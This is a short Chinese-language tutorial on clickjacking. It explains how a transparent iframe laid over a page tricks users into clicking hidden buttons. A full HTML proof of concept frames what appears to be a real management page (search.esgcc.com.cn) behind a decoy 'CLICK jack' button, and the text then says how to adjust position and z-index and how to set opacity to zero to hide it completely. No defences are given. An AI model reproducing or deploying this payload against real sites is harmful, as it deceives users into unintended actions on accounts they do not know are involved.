點擊劫持

什麼是點擊劫持：

是一種視覺上的欺騙，攻擊者使用一個透明的，不可見的iframe標籤，覆蓋在一個網頁上，誘使用戶在該網頁上進行操做，用戶在不知情的狀況下點擊透明的iframe頁面經過調整iframe頁面的位置能夠誘使用戶剛好點擊在iframe頁面的的一些功能性按鈕上

<!DOCTYPE html>

<html lang="en">

<head>

    <meta charset="UTF-8">

    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <meta http-equiv="X-UA-Compatible" content="ie=edge">

    <title>click jack</title>

    <style>

    iframe{

        width:900px;

        height: 250px;

        top: -195px;

        left:-740px;

        z-index: 2;

        -moz-opacity:0.5;

        opacity: 0.5;

        filter:alpha(opacity=0.5);

    }

    button {

        position: absolute;

        top: 10px;

        left: 10px;

        width: 120px;

        z-index:1;

    }

    </style>

</head>

<body>

    <iframe src="http://search.esgcc.com.cn/managerGf/toGfIndexPage" scrolling="no"></iframe>

    <button>CLICK jack</button>

</body>

</html>

經過控制iframe的長寬，調整top，left的位置，能夠把iframe頁面內任意部分覆蓋到任何地方。

同時設置iframe的position位absolute並將z-index的設置爲最大已達到讓iframe在頁面最上層。

最後，經過設置opacity來控制iframe頁面的透明度，值爲0是徹底不可見